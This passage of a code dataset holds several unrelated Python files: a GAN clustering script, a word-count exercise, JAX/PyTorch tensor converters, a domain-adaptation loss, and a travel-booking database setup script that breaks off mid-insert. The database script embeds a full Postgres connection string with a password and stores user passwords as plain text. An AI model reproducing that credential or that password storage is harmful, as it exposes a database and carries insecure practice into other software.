X.astype(np.float32)/(255.0/2) - 1.0\n X_train = torch.FloatTensor(X)\n X_label = torch.LongTensor(label)\n train = torch.utils.data.TensorDataset(X_train,X_label)\n train_loader = torch.utils.data.DataLoader(train, shuffle=False, batch_size=1)\n \n rand=128\n dis=1\n dis_category = 5\n\n class avgpool(nn.Module):\n def __init__(self, up_size=0):\n super(avgpool, self).__init__()\n\n def forward(self, x):\n out_man = (x[:,:,::2,::2] + x[:,:,1::2,::2] + x[:,:,::2,1::2] + x[:,:,1::2,1::2]) / 4\n return out_man\n\n class ResidualBlock(nn.Module):\n\n def __init__(self, in_dim, out_dim, resample=None, up_size=0):\n super(ResidualBlock, self).__init__()\n\n if resample == 'up':\n self.bn1 = nn.BatchNorm2d(in_dim)\n self.conv1 = nn.Conv2d(in_dim, out_dim, 3, 1, 1, bias=True)\n self.upsample = torch.nn.Upsample(up_size,2)\n self.upsample_conv = nn.Conv2d(in_dim, out_dim, 1, 1, 0, bias=True)\n self.conv2 = nn.Conv2d(out_dim, out_dim, 3, 1, 1, bias=True)\n self.bn2 = nn.BatchNorm2d(out_dim)\n\n elif resample == 'down':\n self.conv1 = nn.Conv2d(in_dim, out_dim, 3, 1, 1, bias=True)\n self.conv2 = nn.Conv2d(out_dim, out_dim, 3, 1, 1, bias=True)\n self.pool = avgpool()\n self.pool_conv = nn.Conv2d(in_dim, out_dim, 1, 1, 0, bias=True)\n\n elif resample == None:\n self.conv1 = nn.Conv2d(in_dim, out_dim, 3, 1, 1, bias=True)\n self.conv2 = nn.Conv2d(out_dim, out_dim, 3, 1, 1, bias=True)\n\n self.resample = resample\n\n def forward(self, x):\n\n if self.resample == None:\n shortcut = x\n output = x\n\n output = nn.functional.relu(output)\n output = self.conv1(output)\n output = nn.functional.relu(output)\n output = self.conv2(output)\n\n elif self.resample == 'up':\n shortcut = x\n output = x\n\n shortcut = self.upsample(shortcut) #upsampleconv\n shortcut = self.upsample_conv(shortcut)\n\n output = self.bn1(output)\n output = nn.functional.relu(output)\n output = self.conv1(output)\n\n output = self.bn2(output)\n output = nn.functional.relu(output)\n output = self.upsample(output) #upsampleconv\n output = self.conv2(output)\n\n elif self.resample == 'down':\n shortcut = x\n output = x\n\n shortcut = self.pool_conv(shortcut) #convmeanpool\n shortcut = self.pool(shortcut)\n\n output = nn.functional.relu(output)\n output = self.conv1(output)\n\n output = nn.functional.relu(output)\n output = self.conv2(output) #convmeanpool\n output = self.pool(output)\n\n return output+shortcut\n\n class ResidualBlock_thefirstone(nn.Module):\n\n def __init__(self, in_dim, out_dim, resample=None, up_size=0):\n super(ResidualBlock_thefirstone, self).__init__()\n\n self.conv1 = nn.Conv2d(in_dim, out_dim, 3, 1, 1, bias=True)\n self.conv2 = nn.Conv2d(out_dim, out_dim, 3, 1, 1, bias=True)\n self.pool = avgpool()\n self.pool_conv = nn.Conv2d(in_dim, out_dim, 1, 1, 0, bias=True)\n\n def forward(self, x):\n\n shortcut = x\n output = x\n\n shortcut = self.pool(shortcut) #meanpoolconv\n shortcut = self.pool_conv(shortcut)\n\n output = self.conv1(output)\n output = nn.functional.relu(output)\n output = self.conv2(output) #convmeanpool\n output = self.pool(output)\n\n return output+shortcut\n\n\n class generator(nn.Module):\n\n def __init__(self, rand=128):\n super(generator, self).__init__()\n self.rand = rand\n self.linear = nn.Linear(rand ,2048, bias=True)\n self.layer_up_1 = ResidualBlock(128, 128, 'up', up_size=8)\n self.layer_up_2 = ResidualBlock(128, 128, 'up', up_size=16)\n self.layer_up_3 = ResidualBlock(128, 128, 'up', up_size=32)\n self.bn1 = nn.BatchNorm2d(128)\n self.conv_last = nn.Conv2d(128, 3, 3, 1, 1, bias=True)\n\n def forward(self, x):\n x = x.view(-1,self.rand)\n x = self.linear(x)\n x = x.view(-1,128,4,4)\n x = self.layer_up_1(x)\n x = self.layer_up_2(x)\n x = self.layer_up_3(x)\n x = self.bn1(x)\n x = nn.functional.relu(x)\n x = self.conv_last(x)\n x = nn.functional.tanh(x)\n return x\n\n netG = generator(rand = rand+dis*dis_category)\n\n class discriminator(nn.Module):\n\n def __init__(self):\n super(discriminator, self).__init__()\n self.layer_down_1 = ResidualBlock_thefirstone(3, 128)\n self.layer_down_2 = ResidualBlock(128, 128, 'down')\n self.layer_none_1 = ResidualBlock(128, 128, None)\n self.layer_none_2 = ResidualBlock(128, 128, None)\n #self.mean_pool = nn.AvgPool2d(8,1,0)\n #self.linear = nn.Linear(128,1, bias=True)\n #self.linear2 = nn.Linear(128,10, bias=True)\n\n def forward(self, x):\n x = self.layer_down_1(x)\n x = self.layer_down_2(x)\n x = self.layer_none_1(x)\n x = self.layer_none_2(x)\n #x = self.mean_pool(x)\n x = nn.functional.relu(x)\n x = x.mean(2).mean(2)\n x = x.view(-1, 128)\n\n #shortcut = x\n #output = x\n\n #output = self.linear(output)\n #shortcut= self.linear2(shortcut)\n\n #return output.view(-1,1,1,1), shortcut.view(-1,10,1,1)\n return x\n\n netD = discriminator()\n\n#torch.cuda.set_device(1)\n\n class _netD_D(nn.Module):\n def __init__(self):\n super(_netD_D, self).__init__()\n self.linear = nn.Linear(128,1, bias=True)\n #self.conv = nn.Conv2d(4096, 1, 1, 1, 0, bias=True)\n\n def forward(self, x):\n x = self.linear(x)\n return x.view(-1,1,1,1)\n\n class _netD_Q(nn.Module):\n def __init__(self, nd = 10):\n super(_netD_Q, self).__init__()\n # input is Z, going into a convolution\n #self.conv = nn.Conv2d(4096, 128, 1, 1, 0, bias=True)\n #self.relu = nn.LeakyReLU(0.2, inplace=True)\n #self.conv2 = nn.Conv2d(128, nd, 1, 1, 0, bias=True)\n self.softmax = nn.LogSoftmax()\n #self.linear1 = nn.Linear(4096,128, bias=True)\n #self.relu = nn.LeakyReLU(0.2, inplace=True)\n self.linear2 = nn.Linear(128,nd, bias=True)\n self.nd = nd\n\n def forward(self, x):\n #x = self.linear1(x)\n #x = self.relu(x)\n x = self.linear2(x)\n x = self.softmax(x)\n # x = x.view(64,10)\n return x.view(-1,self.nd,1,1)\n\n netD_D = _netD_D()\n netD_Q = _netD_Q(dis_category)\n \n\n netG.load_state_dict(torch.load(paramsG))\n netD.load_state_dict(torch.load(paramsD))\n netD_D.load_state_dict(torch.load(paramsDD))\n netD_Q.load_state_dict(torch.load(paramsDQ))\n \n data_iter = iter(train_loader)\n predict = []\n netD = netD.cuda()\n netD_Q = netD_Q.cuda()\n\n for iteration in data_iter:\n img, img_label = iteration\n predict_label = netD_Q(netD(Variable(img.cuda())))\n predict.append(predict_label.data.cpu().numpy()) \n \n predict_label = []\n\n for n in range(0, len(predict)):\n predict_label.append(np.argmax(predict[n]))\n\n coherent_array = np.zeros((5,5),dtype=int)\n\n for n in range(0, len(predict)):\n coherent_array[label[n],predict_label[n]] +=1\n \n cout_auc_5(coherent_array)\n print (coherent_array)\n \n\n\n","sub_path":"0722/clustering_0805.py","file_name":"clustering_0805.py","file_ext":"py","file_size_in_byte":11737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"434513535","text":"# Glen Paul Florendo\n# COMPTNG16\n# October 11, 2017\n\nloremIpsumText = \"Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\"\nloremIpsumList = loremIpsumText.split()\n\n# Task 1\nloremIpsumDict = {w: loremIpsumList.count(w) for w in loremIpsumList}\n\n# Task 2\nloremIpsumUniqCount = len(loremIpsumDict)\n\n# Task 3\ndef uniq(textList=[]):\n if len(textList) == 0: # if empty list\n return None\n\n uniqDict = {}\n\n for word in textList:\n if word not in uniqDict:\n uniqDict[word] = 1\n else: # word is in uniqDict\n uniqDict[word] = uniqDict.get(word) + 1\n return uniqDict\n\n\n# Task 4\ntmaasFile = open('agatha christie-tmaas.txt', 'r')\ntmaasText = str(tmaasFile.read())\ntmaasFile.close()\ntmaasList = tmaasText.split()\ntmaasDict = uniq(tmaasList)\n\n","sub_path":"uniq.py","file_name":"uniq.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"558695596","text":"\"\"\" Generic functions to convert Jax DeviceArrays into PyTorch Tensors and vice-versa.\n\"\"\"\nimport warnings\nfrom collections import abc\nfrom functools import singledispatch\nfrom typing import Any, Union, Dict\n\nfrom jax._src import dlpack as jax_dlpack\nfrom jaxlib.xla_extension import DeviceArray\n\ntry:\n import torch\nexcept ImportError:\n warnings.warn(\n \"brax.io.torch requires PyTorch. Please run `pip install torch` to use \"\n \"functions from this module.\"\n )\n raise\n\nfrom torch import Tensor\nfrom torch.utils import dlpack as torch_dlpack\nDevice = Union[str, torch.device]\n\n\n@singledispatch\ndef torch_to_jax(value: Any) -> Any:\n \"\"\"Converts values to JAX tensors.\"\"\"\n # Don't do anything by default, and when a handler is registered for this type of\n # value, it gets used to convert it to a Jax DeviceArray.\n # NOTE: The alternative would be to raise an error when an unsupported value is\n # encountered:\n # raise NotImplementedError(f\"Don't know how to convert {v} to a Jax tensor\")\n return value\n\n\n@torch_to_jax.register(Tensor)\ndef _tensor_to_jax(value: Tensor) -> DeviceArray:\n \"\"\"Converts a PyTorch Tensor into a Jax DeviceArray.\"\"\"\n tensor = torch_dlpack.to_dlpack(value)\n tensor = jax_dlpack.from_dlpack(tensor)\n return tensor\n\n\n@torch_to_jax.register(abc.Mapping)\ndef _torch_dict_to_jax(\n value: Dict[str, Union[Tensor, Any]]\n) -> Dict[str, Union[DeviceArray, Any]]:\n \"\"\"Converts a dict of PyTorch tensors into a dict of Jax DeviceArrays.\"\"\"\n return type(value)(**{k: torch_to_jax(v) for k, v in value.items()})\n\n\n@singledispatch\ndef jax_to_torch(value: Any, device: Device = None) -> Any:\n \"\"\"Convert JAX values to PyTorch Tensors.\n\n By default, the returned tensors are on the same device as the Jax inputs, but if\n `device` is passed, the tensors will be moved to that device.\n \"\"\"\n # Don't do anything by default, and when a handler is registered for this type of\n # value, it gets used to convert it to a torch tensor.\n # NOTE: The alternative would be to raise an error when an unsupported value is\n # encountered:\n # raise NotImplementedError(f\"Don't know how to convert {v} to a Torch tensor\")\n return value\n\n\n@jax_to_torch.register(DeviceArray)\ndef _devicearray_to_tensor(value: DeviceArray, device: Device = None) -> Tensor:\n \"\"\"Converts a Jax DeviceArray into PyTorch Tensor.\"\"\"\n dpack = jax_dlpack.to_dlpack(value)\n tensor = torch_dlpack.from_dlpack(dpack)\n if device:\n return tensor.to(device=device)\n return tensor\n\n\n@jax_to_torch.register(abc.Mapping)\ndef _jax_dict_to_torch(\n value: Dict[str, Union[DeviceArray, Any]], device: Device = None\n) -> Dict[str, Union[Tensor, Any]]:\n \"\"\"Converts a dict of Jax DeviceArrays into a dict of PyTorch tensors.\"\"\"\n return type(value)(**{k: jax_to_torch(v, device=device) for k, v in value.items()})\n","sub_path":"brax/io/torch.py","file_name":"torch.py","file_ext":"py","file_size_in_byte":2892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"7281973","text":"import numpy as np\nimport torch\nimport configs.dann_config as dann_config\n\n\n# call loss_DANN instead of this function\ndef _loss_DANN(\n class_predictions_logits,\n logprobs_target,\n instances_labels,\n is_target,\n domain_loss_weight,\n prediction_loss_weight,\n unk_value=dann_config.UNK_VALUE,\n):\n \"\"\"\n :param class_predictions_logits: Tensor, shape = (batch_size, n_classes).\n Raw (NO logsoftmax).\n :param logprobs_target: Tensor, shape = (batch_size,):\n logprobs that domain is target.\n :param instances_labels: np.Array, shape = (batch_size,)\n :param is_target: np.Array, shape = (batch_size,)\n :param domain_loss_weight: weight of domain loss\n :param prediction_loss_weight: weight of prediction loss\n :param unk_value: value that means that true label is unknown\n \"\"\"\n instances_labels = torch.Tensor(instances_labels).long()\n is_target = torch.Tensor(is_target).float()\n\n crossentropy = torch.nn.CrossEntropyLoss(ignore_index=unk_value)\n prediction_loss = crossentropy(class_predictions_logits, instances_labels)\n binary_crossentropy = torch.nn.BCEWithLogitsLoss()\n domain_loss = binary_crossentropy(logprobs_target, is_target)\n loss = domain_loss_weight * domain_loss \\\n + prediction_loss_weight * prediction_loss\n return loss\n\n\n# call loss_DANN instead of this function\ndef _loss_DANN_splitted(\n class_logits_on_src,\n class_logits_on_trg,\n logprobs_target_on_src,\n logprobs_target_on_trg,\n true_labels_on_src,\n true_labels_on_trg,\n domain_loss_weight,\n prediction_loss_weight,\n unk_value=dann_config.UNK_VALUE,\n):\n \"\"\"\n :param class_logits_on_src: Tensor, shape = (batch_size, n_classes).\n :param class_logits_on_trg: Tensor, shape = (batch_size, n_classes).\n :param logprobs_target_on_src: Tensor, shape = (batch_size,):\n :param logprobs_target_on_trg: Tensor, shape = (batch_size,):\n :param true_labels_on_src: np.Array, shape = (batch_size,)\n :param true_labels_on_trg: np.Array, shape = (batch_size,)\n :param domain_loss_weight: weight of domain loss\n :param prediction_loss_weight: weight of prediction loss\n :param unk_value: value that means that true class label is unknown\n \"\"\"\n # TARGET_DOMAIN_IDX is 1\n source_len = len(class_logits_on_src)\n target_len = len(class_logits_on_trg)\n true_labels_on_src = torch.as_tensor(true_labels_on_src).long()\n true_labels_on_trg = torch.as_tensor(true_labels_on_trg).long()\n is_target_on_src = torch.zeros(source_len, dtype=torch.float)\n is_target_on_trg = torch.ones(target_len, dtype=torch.float)\n\n crossentropy = torch.nn.CrossEntropyLoss(ignore_index=unk_value, reduction='sum')\n prediction_loss_on_src = crossentropy(class_logits_on_src, true_labels_on_src)\n prediction_loss_on_trg = crossentropy(class_logits_on_trg, true_labels_on_trg)\n n_known = (true_labels_on_src != unk_value).sum() + \\\n (true_labels_on_trg != unk_value).sum()\n prediction_loss = (prediction_loss_on_src + prediction_loss_on_trg) / n_known\n\n binary_crossentropy = torch.nn.BCEWithLogitsLoss(reduction='sum')\n domain_loss_on_src = binary_crossentropy(logprobs_target_on_src, is_target_on_src)\n domain_loss_on_trg = binary_crossentropy(logprobs_target_on_trg, is_target_on_trg)\n domain_loss = (domain_loss_on_src + domain_loss_on_trg) / (source_len + target_len)\n loss = domain_loss_weight * domain_loss \\\n + prediction_loss_weight * prediction_loss\n return loss, {\n \"domain_loss_on_src\": domain_loss_on_src,\n \"domain_loss_on_trg\": domain_loss_on_trg,\n \"domain_loss\": domain_loss,\n \"prediction_loss_on_src\": prediction_loss_on_src,\n \"prediction_loss_on_trg\": prediction_loss_on_trg,\n \"prediction_loss\": prediction_loss\n }\n\n\ndef calc_domain_loss_weight(current_iteration,\n total_iterations,\n gamma=dann_config.LOSS_GAMMA):\n progress = current_iteration / total_iterations\n lambda_p = 2 / (1 + np.exp(-gamma * progress))\n return lambda_p\n\n\ndef calc_prediction_loss_weight(current_iteration, total_iterations):\n return 1\n\n\ndef loss_DANN(model,\n batch,\n epoch,\n n_epochs):\n \"\"\"\n :param model: model.forward(images) should return dict with keys\n 'class' : Tensor, shape = (batch_size, n_classes) logits of classes (raw, not logsoftmax)\n 'domain': Tensor, shape = (batch_size,) logprob for domain\n :param batch: dict with keys\n 'src_images':\n 'trg_images':\n 'src_classes':np.Array, shape = (batch_size,)\n 'trg_classes':np.Array, shape = (batch_size,)\n if true_class is unknown, then class should be dann_config.UNK_VALUE\n :param epoch: current number of iteration\n :param n_epochs: total number of iterations\n :return:\n loss: torch.Tensor,\n losses dict:{\n \"domain_loss_on_src\"\n \"domain_loss_on_trg\"\n \"domain_loss\"\n \"prediction_loss_on_src\"\n \"prediction_loss_on_trg\"\n \"prediction_loss\"\n }\n \"\"\"\n model_output = model.forward(torch.Tensor(batch['src_images']))\n class_logits_on_src = model_output['class']\n logprobs_target_on_src = torch.squeeze(model_output['domain']) # TODO: maybe put torch.squeeze in model?\n\n model_output = model.forward(torch.Tensor(batch['trg_images']))\n class_logits_on_trg = model_output['class']\n logprobs_target_on_trg = torch.squeeze(model_output['domain'])\n\n domain_loss_weight = calc_domain_loss_weight(epoch, n_epochs)\n prediction_loss_weight = calc_prediction_loss_weight(epoch, n_epochs)\n return _loss_DANN_splitted(\n class_logits_on_src,\n class_logits_on_trg,\n logprobs_target_on_src,\n logprobs_target_on_trg,\n true_labels_on_src=batch['src_classes'],\n true_labels_on_trg=batch['trg_classes'],\n domain_loss_weight=domain_loss_weight,\n prediction_loss_weight=prediction_loss_weight)\n","sub_path":"loss/dann_loss.py","file_name":"dann_loss.py","file_ext":"py","file_size_in_byte":6120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"34729559","text":"import os\nimport sys\n\nimport psycopg2 as dbapi2\n\nDATABASE_URL = 'postgres://kalcitdkfyeevw:39cdcacf84047dc48c74f58064a25a7406bd3645c95c712b9ba888f28cab791b@ec2-54-243-187-30.compute-1.amazonaws.com:5432/d96hqqveldfnft'\n\nINIT_STATEMENTS = [\n \"\"\"DROP TABLE IF EXISTS images cascade\"\"\",\n \"\"\"DROP TABLE IF EXISTS hotels cascade\"\"\",\n \"\"\"DROP TABLE IF EXISTS expeditions cascade\"\"\",\n \"\"\"DROP TABLE IF EXISTS tickets cascade\"\"\",\n \"\"\"DROP TABLE IF EXISTS seats cascade\"\"\",\n \"\"\"DROP TABLE IF EXISTS users cascade \"\"\",\n \"\"\"DROP TABLE IF EXISTS firms cascade\"\"\",\n \"\"\"DROP TABLE IF EXISTS drivers cascade\"\"\",\n \"\"\"DROP TABLE IF EXISTS vehicles cascade\"\"\",\n \"\"\"DROP TABLE IF EXISTS city cascade\"\"\",\n \"\"\"DROP TABLE IF EXISTS sale cascade\"\"\",\n \"\"\"DROP TABLE IF EXISTS terminal cascade\"\"\",\n \"\"\"DROP TABLE IF EXISTS user_has_sale cascade\"\"\",\n \"\"\"DROP TABLE IF EXISTS images_for_firms cascade\"\"\",\n\n \"\"\"CREATE TABLE IF NOT EXISTS city \n (\n code VARCHAR(2) UNIQUE NOT NULL PRIMARY KEY,\n city_name VARCHAR(25) UNIQUE NOT NULL,\n population INT DEFAULT -1,\n region VARCHAR(20) DEFAULT 'MARMARA',\n altitude INT DEFAULT -1 \n\n )\"\"\",\n\n \"\"\"CREATE TABLE IF NOT EXISTS hotels \n (\n hotel_id SERIAL NOT NULL PRIMARY KEY,\n name VARCHAR (25) NOT NULL,\n email VARCHAR (50) NOT NULL,\n description VARCHAR (250) NOT NULL,\n city VARCHAR(2),\n address VARCHAR (250) NOT NULL,\n phone VARCHAR (15) NOT NULL,\n website VARCHAR (50),\n logo BYTEA,\n FOREIGN KEY (city) REFERENCES city (code) ON DELETE RESTRICT ON UPDATE CASCADE\n\n )\"\"\",\n\n \"\"\"CREATE TABLE IF NOT EXISTS images(\n hotel_id INT NOT NULL,\n image_id SERIAL NOT NULL,\n file_data BYTEA,\n PRIMARY KEY (hotel_id, image_id),\n FOREIGN KEY (hotel_id) REFERENCES hotels (hotel_id) ON DELETE CASCADE ON UPDATE CASCADE ,\n UNIQUE (hotel_id, image_id)\n )\n \"\"\",\n\n\n \"\"\"CREATE TABLE IF NOT EXISTS users \n (\n user_id SERIAL NOT NULL PRIMARY KEY,\n user_name VARCHAR(15) UNIQUE NOT NULL,\n email VARCHAR (50) NOT NULL,\n password VARCHAR (50) NOT NULL,\n name VARCHAR (50) NOT NULL,\n surname VARCHAR (50) NOT NULL,\n phone VARCHAR (15) NOT NULL,\n gender VARCHAR (1) NOT NULL,\n address VARCHAR (250) NOT NULL,\n last_login TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP,\n register_time TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP,\n is_admin BOOLEAN NOT NULL DEFAULT FALSE\n\n )\"\"\",\n\n\n \"\"\"CREATE TABLE IF NOT EXISTS terminal \n (\n terminal_id SERIAL NOT NULL PRIMARY KEY,\n terminal_name VARCHAR(50) UNIQUE NOT NULL,\n terminal_code VARCHAR(6) UNIQUE NOT NULL,\n email VARCHAR (50) NOT NULL,\n phone VARCHAR (15) NOT NULL,\n address VARCHAR (250) NOT NULL,\n description VARCHAR (60) NOT NULL,\n city_id VARCHAR (2),\n FOREIGN KEY (city_id) REFERENCES city (code) ON DELETE CASCADE ON UPDATE CASCADE\n\n )\"\"\",\n\n \"\"\"CREATE TABLE IF NOT EXISTS firms \n (\n firm_id SERIAL NOT NULL PRIMARY KEY,\n name VARCHAR (20) NOT NULL,\n password VARCHAR (50) NOT NULL,\n email VARCHAR (20) NOT NULL,\n phone VARCHAR (20) NOT NULL,\n city VARCHAR (2),\n address VARCHAR (100),\n website VARCHAR (20),\n description VARCHAR (200),\n logo BYTEA,\n FOREIGN KEY (city) REFERENCES city (code) ON DELETE RESTRICT ON UPDATE CASCADE\n \n )\"\"\",\n\n \"\"\"CREATE TABLE IF NOT EXISTS images_for_firms(\n firm_id INT,\n image_id SERIAL NOT NULL,\n file_data BYTEA,\n PRIMARY KEY (firm_id, image_id),\n FOREIGN KEY (firm_id) REFERENCES firms (firm_id) ON DELETE CASCADE ON UPDATE CASCADE ,\n UNIQUE (firm_id, image_id)\n )\n \"\"\",\n\n \"\"\"CREATE TABLE IF NOT EXISTS drivers \n (\n driver_id SERIAL NOT NULL PRIMARY KEY,\n name VARCHAR (20) NOT NULL,\n email VARCHAR (20) NOT NULL,\n gender VARCHAR (20),\n city VARCHAR (2),\n address VARCHAR (200),\n phone VARCHAR (20) NOT NULL,\n firm_id INT,\n FOREIGN KEY (city) REFERENCES city (code) ON DELETE CASCADE ON UPDATE CASCADE,\n FOREIGN KEY (firm_id) REFERENCES firms (firm_id) ON DELETE CASCADE ON UPDATE CASCADE\n )\"\"\",\n\n \"\"\"CREATE TABLE IF NOT EXISTS vehicles \n (\n vehicle_id SERIAL NOT NULL PRIMARY KEY,\n name VARCHAR (20) NOT NULL,\n category VARCHAR (20) NOT NULL,\n model VARCHAR (20) NOT NULL,\n capacity INT NOT NULL,\n production_year INT NOT NULL,\n production_place VARCHAR (20) NOT NULL,\n description VARCHAR (200),\n document BYTEA,\n firm_id INT,\n FOREIGN KEY (firm_id) REFERENCES firms (firm_id)\n \n )\"\"\",\n\n \"\"\"CREATE TABLE IF NOT EXISTS expeditions \n (\n expedition_id SERIAL NOT NULL PRIMARY KEY,\n from_city VARCHAR (02) NOT NULL,\n from_ter INT NOT NULL,\n to_city VARCHAR (02) NOT NULL,\n to_ter INT NOT NULL,\n dep_time VARCHAR (5) NOT NULL ,\n arr_time VARCHAR (5) NOT NULL ,\n date VARCHAR (10) NOT NULL ,\n price INT NOT NULL CHECK (price >= 10),\n plane_id INT NOT NULL ,\n current_cap INT NOT NULL DEFAULT 0,\n total_cap INT NOT NULL,\n driver_id INT NOT NULL,\n firm_id INT NOT NULL,\n document BYTEA,\n FOREIGN KEY (from_city) REFERENCES city (code) ON DELETE RESTRICT ON UPDATE CASCADE,\n FOREIGN KEY (to_city) REFERENCES city (code) ON DELETE RESTRICT ON UPDATE CASCADE,\n FOREIGN KEY (from_ter) REFERENCES terminal (terminal_id) ON DELETE RESTRICT ON UPDATE CASCADE,\n FOREIGN KEY (to_ter) REFERENCES terminal (terminal_id) ON DELETE RESTRICT ON UPDATE CASCADE,\n FOREIGN KEY (plane_id) REFERENCES vehicles (vehicle_id) ON DELETE RESTRICT ON UPDATE CASCADE,\n FOREIGN KEY (driver_id) REFERENCES drivers (driver_id) ON DELETE RESTRICT ON UPDATE CASCADE,\n FOREIGN KEY (firm_id) REFERENCES firms (firm_id) ON DELETE RESTRICT ON UPDATE CASCADE\n \n\n )\"\"\",\n\n \"\"\"CREATE TABLE IF NOT EXISTS seats(\n expedition_id INT NOT NULL,\n user_id INT NOT NULL,\n seat_number INT NOT NULL,\n PRIMARY KEY (expedition_id, user_id, seat_number),\n FOREIGN KEY (expedition_id) REFERENCES expeditions (expedition_id) ON DELETE RESTRICT ON UPDATE CASCADE ,\n FOREIGN KEY (user_id) REFERENCES users (user_id) ON DELETE CASCADE ON UPDATE CASCADE ,\n UNIQUE (expedition_id, user_id, seat_number)\n )\n \"\"\",\n\n \"\"\"CREATE TABLE IF NOT EXISTS tickets(\n expedition_id INT NOT NULL,\n user_id INT NOT NULL,\n seat_number INT NOT NULL,\n ticket_id SERIAL NOT NULL,\n bought_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,\n edited_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,\n is_cancelable BOOLEAN DEFAULT FALSE,\n extra_baggage BOOLEAN DEFAULT FALSE,\n price INT NOT NULL,\n firm_id INT NOT NULL,\n UNIQUE (expedition_id, user_id, seat_number),\n PRIMARY KEY (ticket_id),\n FOREIGN KEY (expedition_id, user_id, seat_number) REFERENCES seats (expedition_id, user_id, seat_number) ON DELETE RESTRICT ON UPDATE CASCADE,\n FOREIGN KEY (firm_id) REFERENCES firms (firm_id) ON DELETE RESTRICT ON UPDATE CASCADE \n )\n \"\"\",\n\n \"\"\"CREATE TABLE IF NOT EXISTS sale(\n sale_id SERIAL NOT NULL PRIMARY KEY,\n sale_code VARCHAR(6) UNIQUE NOT NULL,\n sale_start_at DATE NOT NULL,\n sale_finish_at DATE NOT NULL,\n sale_description VARCHAR (60) NOT NULL,\n is_active BOOLEAN NOT NULL,\n firm_id INT NOT NULL,\n sale_price INT NOT NULL,\n FOREIGN KEY (firm_id) REFERENCES firms (firm_id) ON DELETE CASCADE ON UPDATE CASCADE\n )\"\"\",\n\n \"\"\"CREATE TABLE IF NOT EXISTS user_has_sale(\n sale_id INT NOT NULL,\n user_id INT NOT NULL,\n is_used BOOLEAN NOT NULL,\n PRIMARY KEY (sale_id, user_id),\n FOREIGN KEY (user_id) REFERENCES users (user_id) ON DELETE CASCADE ON UPDATE CASCADE,\n FOREIGN KEY (sale_id) REFERENCES sale (sale_id) ON DELETE CASCADE ON UPDATE CASCADE\n )\"\"\",\n\n \"\"\"INSERT INTO city VALUES \n ('01', 'Adana'),\n ('02', 'Adıyaman'),\n ('03', 'Afyon'),\n ('04', 'Ağrı'),\n ('05', 'Amasya'),\n ('06', 'Ankara'),\n ('07', 'Antalya'),\n ('08', 'Artvin'),\n ('09', 'Aydın'),\n ('10', 'Balıkesir'),\n ('11', 'Bilecik'),\n ('12', 'Bingöl'),\n ('13', 'Bitlis'),\n ('14', 'Bolu'),\n ('15', 'Burdur'),\n ('16', 'Bursa'),\n ('17', 'Çanakkale'),\n ('18', 'Çankırı'),\n ('19', 'Çorum'),\n ('20', 'Denizli'),\n ('21', 'Diyarbakır'),\n ('22', 'Edirne'),\n ('23', 'Elazığ'),\n ('24', 'Erzincan'),\n ('25', 'Erzurum'),\n ('26', 'Eskişehir'),\n ('27', 'Gaziantep'),\n ('28', 'Giresun'),\n ('29', 'Gümüşhane'),\n ('30', 'Hakkari'),\n ('31', 'Hatay'),\n ('32', 'Isparta'),\n ('33', 'Mersin'),\n ('34', 'İstanbul'),\n ('35', 'İzmir'),\n ('36', 'Kars'),\n ('37', 'Kastamonu'),\n ('38', 'Kayseri'),\n ('39', 'Kırklareli'),\n ('40', 'Kırşehir'),\n ('41', 'Kocaeli'),\n ('42', 'Konya'),\n ('43', 'Kütahya'),\n ('44', 'Malatya'),\n ('45', 'Manisa'),\n ('46', 'K.Maraş'),\n ('47', 'Mardin'),\n ('48', 'Muğla'),\n ('49', 'Muş'),\n ('50', 'Nevşehir'),\n ('51', 'Niğde'),\n ('52', 'Ordu'),\n ('53', 'Rize'),\n ('54', 'Sakarya'),\n ('55', 'Samsun'),\n ('56', 'Siirt'),\n ('57', 'Sinop'),\n ('58', 'Sivas'),\n ('59', 'Tekirdağ'),\n ('60', 'Tokat'),\n ('61', 'Trabzon'),\n ('62', 'Tunceli'),\n ('63', 'Şanlıurfa'),\n ('64', 'Uşak'),\n ('65', 'Van'),\n ('66', 'Yozgat'),\n ('67', 'Zonguldak'),\n ('68', 'Aksaray'),\n ('69', 'Bayburt'),\n ('70', 'Karaman'),\n ('71', 'Kırıkkale'),\n ('72', 'Batman'),\n ('73', 'Şırnak'),\n ('74', 'Bartın'),\n ('75', 'Ardahan'),\n ('76', 'Iğdır'),\n ('77', 'Yalova'),\n ('78', 'Karabük'),\n ('79', 'Kilis'),\n ('80', 'Osmaniye'),\n ('81', 'Düzce')\n \n \"\"\",\n\n \"\"\"INSERT INTO terminal VALUES(5,'3de3m2','3d112','3email','3phone2','addres2s','descrip2tion','01')\"\"\",\n\n \"\"\"INSERT INTO terminal VALUES(6,'3devm2','3d1n12', '3emadil', '3phodne2','addres2s','descrip2tion', '01')\"\"\",\n\n \"\"\" INSERT INTO firms\n (firm_id, name, \"password\", email, phone, city, address, website, description, logo)\n VALUES(100, 'deneme', 'deneme', 'deneme@deneme.com', '23452345', '10', NULL, NULL, NULL, NULL);\n \"\"\",\n\n \"\"\" INSERT INTO firms\n (firm_id, name, \"password\", email, phone, city, address, website, description, logo)\n VALUES(101, 'deneme1', 'deneme1', 'deneme1@deneme.com', '234523245', '10', NULL, NULL, NULL, NULL);\n \"\"\",\n\n \"\"\" INSERT INTO firms\n (firm_id, name, \"password\", email, phone, city, address, website, description, logo)\n VALUES(102, 'deneme2', 'deneme2', 'deneme2@deneme.com', '234523245', '10', NULL, NULL, NULL, NULL);\n \"\"\",\n\n \"\"\" INSERT INTO drivers \n (driver_id, name, email, gender, city, address, phone, firm_id)\n VALUES(100, 'driver1', 'driver1', 'kadin','10', 'address', '123123',100);\n \"\"\",\n\n \"\"\" INSERT INTO drivers \n 